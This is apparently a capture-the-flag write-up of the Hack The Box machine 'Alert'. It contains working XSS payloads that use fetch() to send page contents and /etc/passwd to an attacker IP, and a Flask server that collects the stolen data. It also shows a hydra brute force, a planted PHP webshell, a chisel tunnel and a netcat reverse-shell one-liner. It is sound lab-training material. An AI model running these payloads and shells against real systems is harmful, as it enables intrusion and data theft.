![[Alert.png]] ## Summary Of Exploitation Alert was an easy box with a not so easy foothold and a couple rabbit holes that made this box actually really fun. Essentially, a XSS vulnerability leads to sensitive information disclosure from a click happy admin user. Leveraging the data found, I was able to log in via SSH using brute force. Here I discovered a local webserver running as root where I had write privilege's in the Webroot allowing me to pass root commands back to the machine via webshell. Alright, Lets get started As always the first thing I do is my tried and true Nmap scan. I choose this scan pretty much everytime to ensure I get everything all at once with the exception of UDP -sC for common scripts -sV for version detection -p- for all ports --min-rate 10000 for speed -oN to output my changes ![[Hack The Box/Alert/NmapScan.png]] there are 2 open ports, pretty standard for a linux machine. Port 22 ssh OpenSSH 8.2p1 Port 80 http Apache 2.4.41 ((Ubuntu)) | Port | Protocol | Service Details | | ---- | -------- | ------------------- | | 22 | ssh | OpenSSH 8.2p1 | | 80 | http | Apache httpd 2.4.41 | I noticed the redirect and will add it to my /etc/hosts file ![[etcHostsFile.png]] I'm going to start with some light recon of the webserver by navigating via web browser to http://alert.htb and as nmap pointed out, I was redirected to index.php?page=alert. Its looks like all the pages are presented from the page php parameter. Ill keep this in mind for later to check for potential Local File Inclusion. ![[initialWebpage.png]] Just from an initial observation this is an application that allows a user to view markdown. Markdown is a mark up language used to format plain text letters using symbols. I'm going to use the application as intended to demonstrate and see how it works Ill create simple line of text in mousepad modified using markdown, here is a [cheatsheet](https://www.markdownguide.org/cheat-sheet/) ![[markdownTest.png]] Ill upload it on the homepage and click View Markdown ![[ViewMarkdown.png]] ![[MarkdownExample.png]] As you can see the markdown works. I noticed at the bottom, a button to share Markdown. Clicking this shows the same result, but the URL changes to a different php script with a parameter called link_share that gives your markdown a unique value that can be accessed by another user that clicks the link. hmmm Ill keep that in mind. ![[URLweird.png]] Moving on to the contact us page, It looks like there is a way to send a message to the site owners. Ill add this to list of things that are screaming Cross Site Scripting. Ill check out the About Us. ![[contactUs.png]] The about us has a small couple sentences that pretty much confirm my suspected exploitation vector. This sentence in particular. "Our administrator is in charge of reviewing contact messages..." ![[AboutUs.png]] Lastly is the donate page. I didn't see much here, so I donated 40 trillion dollars. ![[Donate.png]] It didn't do anything. To wrap up my recon, I'm going to check for any other hidden pages using fuff to fuzz everything past index.php?page=. To do this, first Ill run ```bash ffuf -w /usr/share/seclists/Discovery/Web-Content/big.txt -u 'http://alert.htb/index.php?page=FUZZ' -fs 690 ``` then once I get a spill of entries, Ill take note of the size and filter it out using the -fs flag ![[SpillOfEntries.png]] ```bash ffuf -w /usr/share/seclists/Discovery/Web-Content/big.txt -u 'http://alert.htb/index.php?page=FUZZ' -fs 690 ``` Running this I will get the pages that return different content. ![[fuffResults.png]] I discovered a hidden page, messages. navigating to messages returns a blank page though, this is probably accessible to an admin and further confirms that I probably need to access it using XSS. ![[HiddenPage.png]] While I'm using fuff, I should also check for hidden subdomains. I can do this by following the same process. ```bash ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -H "Host: FUZZ.alert.htb" -u http://alert.htb ``` wait for the spill ![[SPillforSubdomains.png]] Since the Size is all over the place, Im going to filter by lines using -fl 10. ```bash ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -H "Host: FUZZ.alert.htb" -u http://alert.htb -fl 10 ``` ![[FOundSUbdomain.png]] I found one, statistics! Ill add it to my etc/hosts file ![[statsToEtchosts.png]] Then Ill navigate to it in my browser and see what comes up. ![[SignInforStats.png]] Looks like this subdomain requires basic authentication to access. I tried passing some default creds such as admin/password and admin/1234 but nothing worked. Ill take note and come back to this. I want to start poking at the markdown viewer and see if its vulnerable to Cross Site Scripting. My assumption is that I can leverage the XSS vulnerability to steal a cookie and access admin parts of the webserver, such as messages or the statistics subdomain. Lets give a try. First Ill open my mousepad (kali notepad) and replace it with a markdown XSS payload that I got from [here](https://github.com/JakobTheDev/information-security/blob/master/Payloads/md/XSS.md). Ill grab the first one that creates a malicious link called XSS. ``` [XSS](javascript:prompt(document.cookie)) ``` Then Ill simply upload it to the markdown viewer and hopefully get a prompt showing my cookie when I click the link. ![[GifOfXSS.gif]] This is a great start. I can clearly run JavaScript to perform XSS. But I don't have a cookie and I'm not sure if the admin does either. I also don't like the idea of the admin having to click multiple links if I send him my share link. ## Exploitation Phase Lets keep testing. Can I just run script tags? Ill pass the following code to my payload file. ``` <script> prompt(document.cookie); </script> ``` ![[JustscriptTage.gif]] Yes, I can! easy day. that solves one issue. Next I need to see if the admin has a cookie I can steal. In order to do this, I need to send a link that connects back to my own webserver. I can accomplish this using the python http.server but I want to log my requests, so I'm going to build my own. I can do this by creating the following python script using Flask. ``` from flask import Flask, request, redirect from datetime import datetime app = Flask(__name__) @app.route('/') def getCookie(): cookie = request.args.get('data') f = open("requests.txt","a") f.write(cookie + ' ' + str(datetime.now()) + '\n') f.close() return redirect("http://alert.htb") if __name__ == "__main__": app.run(host = '10.10.14.16', port=8080) ``` To explain line by line, the first 2 lines import all the necessary packages ill need - Flask for the webserver framework - request for the HTTP data handling - redirect to continue to illusion for the admin - datetime for timestamps app = Flask... creates the application instance to handle the incoming requests **`@app.route('/')`**: Maps the root URL (`/`) to the `cookie` function. When the server receives a request to `/`, this function is executed. Then we define the function getCookie() We want to capture the result of the requests using the query parameter data, so we create a variable called cookie to store that information. f = open will create a text file named requests.txt, we can use this as a log. f.write will write the data in the cookie variable to the text file with a timestamp. f.close will close the file return redirect will redirect the user back to the homepage to keep us sneaky the last bit runs the script on my tun0 interface on port 8080. Alright, for the rest of my testing, I'm going to have this running in one terminal with the requests.txt open with the log on the bottom. ![[ServerAndLog.png]] Now Im going to modify my payload to send the cookie to my webserver than a prompt using fetch. ``` <script> fetch('http://10.10.14.16:8080/?data=' + encodeURIComponent(document.cookie)); </script> ``` Ill upload it and see what happens ![[TestOfconnection.gif]] Great! I managed to connect back to myself! my cookie is still empty so my log only has a timestamp and I'm still hoping that maybe the admin has a cookie (Spoiler Alert, he doesn't). To get the admin to connect, Ill first need to grab my infected URL by clicking the Share Markdown button at the bottom. This will give me the URL I showed previously. Ill then need to essentially phish. Ill navigate to the contact us page and write a message to the admin as [email protected]. (I tried sending a message, but it was being finicky, so just pretend I sent a convincing phishing message). ![[NoCookie.gif]] To my disappointment, there was no cookie. I pretty much expected this because I had no cookie myself. However, I can still leverage this vulnerability to check if anything is on the messages page from the admins perspective by using fetch again. After some trial and error, I settled on this. ``` <script> fetch('/index.php?page=messages') .then(response => response.text()) .then(data => { fetch('http://10.10.14.16:8080/?data=' + encodeURIComponent(data)) }); </script> ``` the fetch will grab the content of the messages page. the first .then processes the response the second .then sends the data back to me. Lets update the payload and test it on ourselves by uploading the markdown. ![[TestOfMessagesGather.gif]] Awesome! it works. You can see in the log that the page is blank, just like when we viewed the page ourselves. Now lets see what the admin sees by sending him the link. This admin needs some serious training. ![[MessagesHadAFile.gif]] Looking at the log, we can clearly see that messages has a file! lets get that file, we can do this the same way we got the web page. we just need to fetch the reference like this. ``` <script> fetch('/messages.php?file=2024-03-10_15-48-34.txt') .then(response => response.text()) .then(data => { fetch('http://10.10.14.16:8080/?data=' + encodeURIComponent(data)) }); </script> ``` Ill go through the same process of uploading and sending the message as before and I checked the logs... ![[NotHappyAtAll.png]] blank...BLANK! This is when the insanity kicked in. You know, the process of doing the same thing over and over again. It wasn't until later that I realized I should check for directory Traversal. Maybe I can access a file outside the webroot. It didn't work for index.php, but maybe it'll work here. Ill update my payload as such to check. ``` <script> fetch('/messages.php?file=../../../../../../../../../../etc/passwd') .then(response => response.text()) .then(data => { fetch('http://10.10.14.16:8080/?data=' + encodeURIComponent(data)) }); </script> ``` ![[etcpasswd.gif]] Fantastic! not only did I find a directory traversal vulnerability, but I have the users, Albert and David. I'm going to assume that one of these users has access to the previously discovered subdomain statistics. Since statistics is using basic auth, I'm going to run a bruteforce against it to see if I can get a password using hydra. ``` hydra -l albert -P /usr/share/wordlists/rockyou.txt -f statistics.alert.htb http-get ``` Ill start with albert, and use rockyou.txt for password list. -f will be the uri and http-get to bruteforce basic auth. After a few seconds, I get a hit! ![[AlbertPassword.png]] Neat, I immediately want to pass this to SSH to see if I have a winner... ![[ShellAsAlbert.png]] ## Pric-Esc to Root I have a winner. Ill go ahead and grab the user.txt file! ![[Hack The Box/Alert/UserFlag.png]] Time to look around. Ill first check for sudo privilege's ``` sudo -l ``` ![[NoSudoL.png]] Albert may not run sudo, oh well. is albert is any powerful groups? ![[ManagmentGroup.png]] management looks interesting and potentially a vector for Privilege escalation. Next I usually look at the /opt directory for anything interesting. ![[OptDir.png]] website-monitor is interesting, but what is more interesting is that the management group can access config. This could be a vector. But first I want to see what is running website-monitor. So Ill run ```bash ps -aux ``` ![[PsAux.png]] I see, Website-monitor is a local webserver on port 8080 that monitors the external webservers. What's most important is that it is run by root. I found our vector. its time to HACK... ![[hacker-hacking.gif]] First I wanna see if I can write a file into that config directory. Ill go ahead and drop a super simple php webshell. ![[Backdoor.png]] I can! as expected from the permissions. Now I just need to access it. I'm going to use chisel to proxy this. ^6c10ea Ill go [here](https://github.com/jpillora/chisel/releases) to grab the latest version of chisel and download it to my kali. ![[Hack The Box/Alert/wgetChisel.png]] I will unzip it, rename it, and make it an executable. ![[Unzip.png]] now I need to port it to the victim using python http.server ``` python3 -m http.server 8000 ``` ![[MoveingChisel.gif]] Ill make it an executable ``` chmod +x chisel ``` Now I need to start the server. On the Attacker, Im going to run the following to start the reverse proxy server. ``` ./chisel server -p 8000 --reverse ``` ![[ChiselServer.png]] Now on the victim I need to run the following to allow access for me locally. ``` ./chisel client 10.10.14.16:8000 R:8080:127.0.0.1:8080 ``` ![[COmmunication.png]] Now you can the server is communicating with the client. I can now navigate to http://127.0.0.1:8080 and see the monitor hosted on the victim from the comfort of my attacker. ![[AccessToMonitor.png]] I should now be able to access my webshell and run root commands! ![[Hack The Box/Alert/RCE.png]] That is Remote Code Execution! I can grab the root.txt file ![[Hack The Box/Alert/RootFlag.png]] To really own this machine. We need a functional cmd shell. So Ill pass a one liner that works fine in the address bar with my netcat listener on 443. ``` busybox nc 10.10.14.16 443 -e /bin/bash ``` ![[CMDSHell.gif]] nice, now the age old trick to get me a functional shell ^e045cb ``` python3 -c 'import pty; pty.spawn("/bin/bash")' Ctrl ^Z stty raw -echo && fg reset screen export TERM=xterm clear ``` ![[AgeOldTrick.gif]]![[BOOM.png]] And there you have it. I thoroughly enjoyed rooting this box. It had a lot of good learning experiences. While not incredibly realistic, it push's you to think further than just grabbing a cookie. Thank you for taking the time to read this write up! Happy Hacking!